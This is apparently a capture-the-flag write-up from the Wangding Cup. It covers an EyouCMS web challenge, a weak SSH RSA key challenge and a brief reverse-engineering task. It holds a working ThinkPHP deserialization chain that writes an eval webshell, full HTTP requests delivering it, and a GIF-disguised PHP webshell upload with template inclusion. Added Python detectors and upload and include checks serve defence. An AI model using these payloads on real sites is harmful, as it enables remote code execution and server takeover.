web01
Method 1: Deserialization
References:
google: https://n1k0la-t.github.io/2023/01/28/EyouCMS%20v1.6.1%200day%E6%8C%96%E6%8E%98/
FreeBUF: https://www.freebuf.com/vuls/405365.html
Build the request according to that article.
Deserialization chain:
<?php
// POP chain from the referenced articles. The namespaces mirror ThinkPHP's so that
// serialize() emits the class names the target will resolve.
namespace think\cache\driver;

class File
{
    public $tag = 't';
    public $options = [
        'path' => 'php://filter/string.rot13/resource=<?cuc @riny($_TRG[_]);?>/../a.php'
    ];
}

namespace think\session\driver;

use think\cache\driver\File;

class Memcached
{
    public $handler;

    function __construct()
    {
        $this->handler = new File();
    }
}

namespace think\console;

use think\session\driver\Memcached;

class Output
{
    public $styles = ['removeWhereField'];

    function __construct()
    {
        $this->handle = new Memcached();
    }
}

namespace think\model\relation;

use think\console\Output;

class HasOne
{
    function __construct()
    {
        $this->query = new Output();
    }
}

namespace think\model;

use think\model\relation\HasOne;

class Pivot
{
    public $append = ['getError'];

    public function __construct()
    {
        $this->error = new HasOne();
    }
}

namespace think\process\pipes;

use think\model\Pivot;

class Windows
{
    public function __construct()
    {
        $this->files = [new Pivot()];
    }
}

$x = new Windows();
echo strlen(serialize($x));
echo base64_encode(serialize($x));
1. First add a column. Its default id is 541; if that does not work, the id can be brute-forced.
POST /04cfe8025e76b4985ae4aee3b162b2d1/login.php?m=admin&c=Field&a=arctype_add&_ajax=1&lang=cn HTTP/1.1
Host: 192.168.1.3
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 94
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=6unq4gjml60ldlodv54t4i5m51; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=welcome%7CIndex
Origin: http://192.168.1.3
Referer: http://192.168.1.3/login.php?m=admin&c=Arctype&a=ajax_newtpl&lang=cn&type=lists&nid=single
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
title=web01test&name=web01test&dtype=region&dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99
2. Edit this column and write the serialized content into it:
POST /04cfe8025e76b4985ae4aee3b162b2d1/login.php?m=admin&c=Field&a=arctype_edit&_ajax=1&lang=cn HTTP/1.1
Host: 192.168.1.3
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 1001
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: PHPSESSID=6unq4gjml60ldlodv54t4i5m51; admin_lang=cn; home_lang=cn; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; workspaceParam=welcome%7CIndex
Origin: http://192.168.1.3
Referer: http://192.168.1.3/login.php?m=admin&c=Arctype&a=ajax_newtpl&lang=cn&type=lists&nid=single
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
X-Requested-With: XMLHttpRequest
title=web01test&name=web01test&old_dtype=region&dfvalue=O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7Ds%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7Ds%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=548&old_name=web01test&dtype[]=region
Written successfully.
3. Visit the page to trigger the deserialization.
4. I could not reproduce this in the environment I set up locally; it is probably a PHP version or ThinkPHP issue. In the competition environment it worked straight away.
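For the defending side, the step-2 request is also a useful detection sample. The Python script below is an added example, not code from the writeup or from EyouCMS: it pulls every form field out of the request body quoted above, recognises the PHP-serialized object in dfvalue, parses it with a small stand-alone parser (so PHP's unserialize() is never involved) and reports the class chain together with any string that carries a stream wrapper, a traversal sequence or a PHP open tag. The request body is the one from step 2; the list of markers to flag is my own choice.

```python
# Added example (not from the writeup): spot a PHP object-injection payload in a form body and list its gadget chain without calling PHP's unserialize().
import re
from collections import namedtuple
from urllib.parse import parse_qs

# Request body from step 2 of the writeup; the dfvalue field carries the serialized chain.
SAMPLE_BODY = (
    "title=web01test&name=web01test&old_dtype=region&dfvalue="
    "O%3A27%3A%22think%5Cprocess%5Cpipes%5CWindows%22%3A1%3A%7Bs%3A5%3A%22files%22%3Ba%3A1%3A%7Bi%3A0%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A2%3A%7Bs%3A6%3A%22append%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A8%3A%22getError%22%3B%7D"
    "s%3A5%3A%22error%22%3BO%3A27%3A%22think%5Cmodel%5Crelation%5CHasOne%22%3A1%3A%7Bs%3A5%3A%22query%22%3BO%3A20%3A%22think%5Cconsole%5COutput%22%3A2%3A%7Bs%3A6%3A%22styles%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A16%3A%22removeWhereField%22%3B%7D"
    "s%3A6%3A%22handle%22%3BO%3A30%3A%22think%5Csession%5Cdriver%5CMemcached%22%3A1%3A%7Bs%3A7%3A%22handler%22%3BO%3A23%3A%22think%5Ccache%5Cdriver%5CFile%22%3A2%3A%7Bs%3A3%3A%22tag%22%3Bs%3A1%3A%22t%22%3Bs%3A7%3A%22options%22%3B"
    "a%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A68%3A%22php%3A%2F%2Ffilter%2Fstring.rot13%2Fresource%3D%3C%3Fcuc+%40riny%28%24_TRG%5B_%5D%29%3B%3F%3E%2F..%2Fa.php%22%3B%7D%7D%7D%7D%7D%7D%7D%7D"
    "&old_dfvalue=1&remark=&typeids%5B%5D=0&channel_id=-99&id=548&old_name=web01test&dtype[]=region"
)

SERIALIZED_OBJECT = re.compile(r'^[OC]:\d+:"')                  # O:<len>:"Class" or C:<len>:"Class"
SUSPICIOUS = (b"php://", b"file://", b"data:", b"../", b"<?")  # markers worth flagging in any string
PhpObject = namedtuple("PhpObject", "name props")                # a parsed O: record; nothing is instantiated

def parse_php_serialized(data: bytes):
    """Parse one PHP-serialized value; strings stay bytes because PHP lengths are byte counts."""
    pos = 0

    def read_until(delim):
        nonlocal pos
        end = data.index(delim, pos)           # ValueError if the delimiter never comes
        token, pos = data[pos:end], end + 1
        return token

    def expect(tok):
        nonlocal pos
        if data[pos:pos + len(tok)] != tok:
            raise ValueError(f"expected {tok!r} at offset {pos}")
        pos += len(tok)

    def take(prefix, delim):                   # consume prefix, then everything up to delim
        expect(prefix)
        return read_until(delim)

    def read_pairs(count):                     # key/value body shared by arrays and objects
        items = {}
        for _ in range(count):
            key = read_value()
            items[key] = read_value()
        expect(b"}")
        return items

    def read_value():
        nonlocal pos
        tag, pos = data[pos:pos + 1], pos + 1
        if tag == b"N":
            expect(b";")
            return None
        if tag in (b"b", b"i", b"d"):
            raw = take(b":", b";")
            return float(raw) if tag == b"d" else int(raw)
        if tag == b"s":
            length = int(take(b":", b":"))
            expect(b'"')
            value, pos = data[pos:pos + length], pos + length
            expect(b'";')
            return value
        if tag == b"a":
            count = int(take(b":", b":"))
            expect(b"{")
            return read_pairs(count)
        if tag == b"O":
            take(b":", b":")                   # class-name length; the quotes delimit it anyway
            name = take(b'"', b'"').decode("utf-8", "replace")
            count = int(take(b":", b":"))
            expect(b"{")
            return PhpObject(name, read_pairs(count))
        raise ValueError(f"unsupported tag {tag!r} at offset {pos - 1}")

    return read_value()

def summarize(value, path="$", classes=None, flagged=None):
    """Class names in nesting order, plus (path, text) for every string carrying a SUSPICIOUS marker."""
    classes = [] if classes is None else classes
    flagged = [] if flagged is None else flagged
    label = lambda k: k.decode("utf-8", "replace") if isinstance(k, bytes) else str(k)
    if isinstance(value, PhpObject):
        classes.append(value.name)
        for k, v in value.props.items():
            summarize(v, f"{path}.{label(k)}", classes, flagged)
    elif isinstance(value, dict):
        for k, v in value.items():
            summarize(v, f"{path}[{label(k)}]", classes, flagged)
    elif isinstance(value, bytes) and any(m in value for m in SUSPICIOUS):
        flagged.append((path, value.decode("utf-8", "replace")))
    return classes, flagged

def analyze_request_body(body: str) -> list:
    """One finding per form field whose value starts like a serialized PHP object."""
    findings = []
    for param, values in parse_qs(body).items():
        for raw in (v.encode("utf-8") for v in values if SERIALIZED_OBJECT.match(v)):
            try:
                classes, flagged = summarize(parse_php_serialized(raw))
                findings.append({"param": param, "classes": classes, "suspicious_strings": flagged})
            except (ValueError, TypeError) as exc:    # malformed or truncated payload
                findings.append({"param": param, "error": str(exc)})
    return findings
```

Run over the body above, `analyze_request_body(SAMPLE_BODY)` returns one finding for dfvalue: the six think\... class names in nesting order, ending in think\cache\driver\File, and a single flagged string at `$.files[0].error.query.handle.handler.options[path]` beginning with php://filter/. That combination (a serialized ThinkPHP object arriving in a form field, with a php:// wrapper inside it) is what a WAF rule or log search should alert on, and the same parser triages stored values found in the database after an incident, since step 2 writes the payload into the column record.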
Method 2: File upload + file inclusion
1. Upload
POST /login.php?m=admin&c=Ueditor&a=imageUp&savepath=allimg&pictitle=banner&dir=images&is_water=1&lang=cn&unneed_syn= HTTP/1.1
Host: 192.168.10.35
Content-Length: 432
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjnlAMRs0RqFuCxyM
Origin: http://192.168.10.35
Referer: http://192.168.10.35/login.php?m=admin&c=Uploadimgnew&a=get_upload_list&info=eyJudW0iOjEsInNpemUiOjIwOTcxNTIsImlucHV0IjoiIiwiZnVuYyI6IndlY2hhdF9waWNfY2FsbF9iYWNrIiwicGF0aCI6ImFsbGltZyIsImlzX3dhdGVyIjoxfQ%3D%3D&lang=cn&unneed_syn=
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: espcms_web_user_info=Ka46smL5rcg9exEplxVYBVPRwmhEQA6WeYFCIvIMSsqPsuPuTTNb3W1%2FjaBzTU8ez8gp%2B8pggV96%2FZZtDyCp2uJtQy8NyMSIat%2BvE15CWXvwKG3n5VqW2skWCXQ6epGhfQsVExJeu5afV6hcPyVcTp335WzaCu4L6q3YSjw9sR8ss3Vrctetiruty%2FS2UUD9NzKAaXwbsQ7Sndg3zsSi1RfTrIS7Txat%2B6jfxE%2FR36YAGMyepHPgXUX3CjAw4h7mBNtve5A2ZgpXZvG%2BJIBZVsfK2%2FQeVbCv7NCTHnRKapvzrqpvJk%2F8GWLVJUy%2F%2F74T5zcsZ5k05IjJy%2BszM77h4TOAg6rWLOaIZphyxq8I%2B88iwSHEFYRkWXB%2B9iXLDCVuATDNEcS0iMCecO9yhvRLpQEGrZuwV5fuHlhqg3IUjSV6DdNsBmWlxFfs%2BKWUAugin%2BrJ3AegVzg3jRgqIQwuXg5LwcfuUaPtPpqYdvMfJSJkrn2qTXqE0A9H7xv47mPWqcc9QBuJdiaSVt3ijy%2FcS0Hodi7p6gQ4AIYvxVYczR%2B%2FSrTxflt5EPng0QICB8keDjUPoLZ0bBT2YXXNzafYm%2Bn7b1NT2mtsdqNbDwffTjAKprS8iU1jKiyHtkg0PtGkE2HopemShQWMUjyjjlFoUsy5THdslhBwJNEwYYuQpPc2dH1VQYVPvezGze%2FEw%2B6frJ7ieHN6k2izdIJBK5lFsdAnJySSQgDlciYU632iSBxlUhOeErpPgxdh9ON7HctN%2FHWc7bXuKLtukHXubGDz0qiyo8sZ%2Fd7kPa%2FhOwCmI4MtIpnewKEEIzLn5wyMGFdj; espcms_web_server_info=cnlbzvT9pkB%2F%2Fa3QXzislq9%2B4%2BgVEB33q9hnv74tDZXmh5ZVm50VInsr%2BTFqqZIwS9KGlhqQlhlmBozbvdy7rRXUEE72xLLajnYi0wLIYmA%3D; PHPSESSID=e7jp10jq6tvdrspdg2uhfmaugh; admin_lang=cn; home_lang=cn; admin-treeClicked-Arr=%5B%5D; admin-arctreeClicked-Arr=%5B%5D; ENV_IS_UPHTML=0; ENV_UPHTML_AFTER=%7B%22seo_uphtml_after_home%22%3A0%2C%22seo_uphtml_after_channel%22%3A0%2C%22seo_uphtml_after_pernext%22%3A%221%22%7D; ENV_GOBACK_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; ENV_LIST_URL=%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn; imgname_id_upload=erweima.png; workspaceParam=web%7CSystem; img_id_upload=
Connection: keep-alive
------WebKitFormBoundaryjnlAMRs0RqFuCxyM
Content-Disposition: form-data; name="_ajax"
1
------WebKitFormBoundaryjnlAMRs0RqFuCxyM
Content-Disposition: form-data; name="file"; filename="erweima.gif"
Content-Type: image/png
GIF89a<?php @eval($_POST['hack']);phpinfo();system("dir");?>
------WebKitFormBoundaryjnlAMRs0RqFuCxyM
Content-Disposition: form-data; name="type_id"
0
------WebKitFormBoundaryjnlAMRs0RqFuCxyM--
2. File inclusion
Use the function map to find the template feature and include the uploaded file in index.html:
{eyou:include file="uploads/allimg/20241107/1-24110G513534M.gif" /}
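Two server-side checks would stop this method at either stage. The Python below is an added example, not code from the writeup or from EyouCMS: the upload check rejects the file from step 1 because its extension, Content-Type and body disagree and because a PHP open tag follows the GIF89a header; the include check accepts only relative .htm/.html paths under a template root, so the uploads/... target from step 2 is refused. The template root (`template/`) and the allowed extensions are assumptions for this example; the sample upload and the include tag are the ones quoted above.

```python
# Added example (not from the writeup): the upload and include checks that block Method 2.
import re
from pathlib import PurePosixPath

# Signatures of the image formats an image uploader normally accepts.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}
CONTENT_TYPES = {"image/gif": "gif", "image/png": "png", "image/jpeg": "jpg"}
# PHP open tags; a raster image never legitimately contains these.
SCRIPT_MARKERS = re.compile(rb"<\?php|<\?=|<\?\s", re.IGNORECASE)

# Assumed template layout for the include check (an assumption for this example, not
# EyouCMS's real configuration): templates live under template/ and only .htm/.html
# files may be included.
TEMPLATE_ROOT = "template"
TEMPLATE_EXTS = {".htm", ".html"}
INCLUDE_TAG = re.compile(r'\{eyou:include\s+file=["\']([^"\']+)["\']', re.IGNORECASE)


def check_upload(filename: str, content_type: str, data: bytes) -> list:
    """Return the reasons to reject an upload; an empty list means accept."""
    ext = PurePosixPath(filename).suffix.lower().lstrip(".")
    if ext not in MAGIC:
        return [f"extension .{ext or '(none)'} not allowed"]
    reasons = []
    declared = CONTENT_TYPES.get(content_type)
    if declared is None or MAGIC[declared] != MAGIC[ext]:
        reasons.append(f"Content-Type {content_type} does not match .{ext}")
    if not data.startswith(MAGIC[ext]):
        reasons.append(f"file header is not a {ext} signature")
    if SCRIPT_MARKERS.search(data):
        reasons.append("PHP open tag found inside image data")
    return reasons


def is_allowed_template(path: str) -> bool:
    """Allow only relative .htm/.html paths under TEMPLATE_ROOT: no traversal, no schemes."""
    if "\x00" in path or "\\" in path or ":" in path:
        return False
    p = PurePosixPath(path)
    if p.is_absolute() or ".." in p.parts or not p.parts:
        return False
    return p.parts[0] == TEMPLATE_ROOT and p.suffix.lower() in TEMPLATE_EXTS


def audit_template(source: str) -> list:
    """List the include targets in a template that the allow-list would refuse."""
    return [m for m in INCLUDE_TAG.findall(source) if not is_allowed_template(m)]


# Sample inputs: the upload from step 1 as quoted in the writeup, a constructed clean
# 1x1 GIF, and the include tag from step 2.
UPLOADED_NAME, UPLOADED_TYPE = "erweima.gif", "image/png"
UPLOADED_DATA = b"GIF89a<?php @eval($_POST['hack']);phpinfo();system(\"dir\");?>"
CLEAN_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
             b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")
INCLUDE_LINE = '{eyou:include file="uploads/allimg/20241107/1-24110G513534M.gif" /}'

if __name__ == "__main__":
    print(check_upload(UPLOADED_NAME, UPLOADED_TYPE, UPLOADED_DATA))
    print(check_upload("ok.gif", "image/gif", CLEAN_GIF))
    print(audit_template(INCLUDE_LINE))
```

Magic-byte and tag scanning are a second line of defence only: re-encoding every uploaded image with an image library and keeping the upload directory outside anything the template engine or the PHP handler will ever read is what removes the risk. The include allow-list matters even then, because the template tag is what turns a stored image into executed code.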
Solution steps (WriteUp)
Step 1: The environment is as shown in the figure.
Step 2: A 御剑 (Yujian) scan finds robots.txt.
Step 3: Download wbStego4.bmp.
Step 4: Convert it to public-key format:
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=
Step 5: Crack the public key with the 西二风 CTF tool.
Step 6: Export the private key and connect over SSH.
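Before handing a key to any cracking tool it is worth confirming what it actually is. The script below is an added example, not part of the writeup: it parses the step-4 ssh-rsa line with the standard library only (RFC 4251 length-prefixed fields) and runs the checks a key audit applies first: public exponent, modulus size and parity, divisibility by small primes, perfect square. The key line is the one from step 4; the set of expected modulus sizes is my assumption.

```python
# Added example (not from the writeup): parse an OpenSSH ssh-rsa public key line and run basic audit checks.
import base64
import math
import struct

# Public key from step 4 of the writeup.
PUBKEY_LINE = "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU="

# Modulus sizes a mainstream generator produces (assumption for this audit); anything else deserves a look.
EXPECTED_SIZES = {2048, 3072, 4096}
# Odd primes below 2000 for a cheap small-factor check.
SMALL_PRIMES = [p for p in range(3, 2000, 2)
                if all(p % q for q in range(3, math.isqrt(p) + 1, 2))]


def _read_field(blob: bytes, pos: int):
    """Read one RFC 4251 'string': uint32 big-endian length followed by that many bytes."""
    if pos + 4 > len(blob):
        raise ValueError("truncated key blob")
    (length,) = struct.unpack(">I", blob[pos:pos + 4])
    end = pos + 4 + length
    if end > len(blob):
        raise ValueError("field runs past the end of the blob")
    return blob[pos + 4:end], end


def parse_ssh_rsa(line: str):
    """Return (e, n) from an authorized_keys-style 'ssh-rsa <base64> [comment]' line."""
    parts = line.split()
    if len(parts) < 2 or parts[0] != "ssh-rsa":
        raise ValueError("not an ssh-rsa public key line")
    blob = base64.b64decode(parts[1], validate=True)
    keytype, pos = _read_field(blob, 0)
    e_bytes, pos = _read_field(blob, pos)
    n_bytes, pos = _read_field(blob, pos)
    if keytype != b"ssh-rsa" or pos != len(blob):
        raise ValueError("malformed ssh-rsa blob")
    return int.from_bytes(e_bytes, "big"), int.from_bytes(n_bytes, "big")


def audit_rsa_public(e: int, n: int) -> list:
    """Cheap structural checks; an empty list means nothing obviously wrong."""
    findings = []
    bits = n.bit_length()
    if bits not in EXPECTED_SIZES:
        findings.append(f"unusual modulus size {bits} bits (expected one of {sorted(EXPECTED_SIZES)})")
    if n % 2 == 0:
        findings.append("modulus is even")
    if e < 3 or e % 2 == 0:
        findings.append(f"invalid public exponent {e}")
    elif e < 65537:
        findings.append(f"small public exponent {e}")
    for p in SMALL_PRIMES:
        if n % p == 0:
            findings.append(f"modulus divisible by small prime {p}")
            break
    if math.isqrt(n) ** 2 == n:
        findings.append("modulus is a perfect square (p == q)")
    return findings


def audit_key_line(line: str) -> dict:
    e, n = parse_ssh_rsa(line)
    return {"e": e, "bits": n.bit_length(), "findings": audit_rsa_public(e, n)}


if __name__ == "__main__":
    report = audit_key_line(PUBKEY_LINE)
    print(f"e={report['e']} modulus={report['bits']} bits")
    for finding in report["findings"]:
        print(" -", finding)
```

On this key the exponent is the usual 65537, but the modulus is 2047 bits rather than 2048: the leading byte of the mpint is 0x7a, so the top bit is clear. A plain `ssh-keygen -b 2048` run sets that bit and returns exactly 2048 bits, so the size alone says the key was not produced the ordinary way and justifies the closer look the writeup then takes.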
Setting up a local SSH public-key login environment
FROM ubuntu:20.04

# Install the SSH server
RUN apt-get update && \
    apt-get install -y openssh-server && \
    mkdir /var/run/sshd && \
    mkdir /root/.ssh

# Set the root password (optional). The command is garbled on the original page
# (only "*111!!' | chpasswd :" survives), so it is left commented out here:
# RUN echo 'root:<password>' | chpasswd

# Allow root to log in over SSH (only needed for password login; the default
# prohibit-password already permits key-based root login)
RUN sed -i 's/#PermitRootLogin prohibit-password/PermitRootLogin yes/' /etc/ssh/sshd_config

# Add the public key
RUN echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAHqSISYfkwuFeX20KTtyDhpG/nmyMK5MrmjKILUbLxpEtgw+4i0sIR4sWtNpGSVAMLZ4YO8EY6p7FBw0z4u0ALo2qC8I763lfKlNXH1WHWexRHd72MEpxpOzt79ukabEr7OWpRdDEISj3MyEalVNYGTKMt/TQWR/dnFd+TsDB2aRDBQQq9VfQhZ9Z864huQ4Du8PKg42plzfRPJsEhe4JpE0GW5QRap9ZNHM/4fSSHJlwqbBqGdeIjw+U7zY/RokxK979+f7SN6qMc9FzAUTnbwFGLpZe4ohz4pPJNrmRKfERTSKDoXw1krdDZuEZzCgiprpR8WqLvGoDXhYstcrgWU=" > /root/.ssh/authorized_keys

# Set the correct permissions
RUN chmod 700 /root/.ssh && \
    chmod 600 /root/.ssh/authorized_keys

# Expose the SSH port
EXPOSE 22

# Start the SSH service
CMD ["/usr/sbin/sshd", "-D"]
docker build -t ssh-server .
docker run -d -p 2222:22 --name ssh-container ssh-server
Reverse2
Solution steps (WriteUp)
1. Decompile and read the class files directly; search for wdflag in them.
2. Dump memory.
Originally published on the WeChat public account 瓜神学习网络安全: 网鼎杯玄武组_部分WP (Wangding Cup, Xuanwu division: partial write-ups)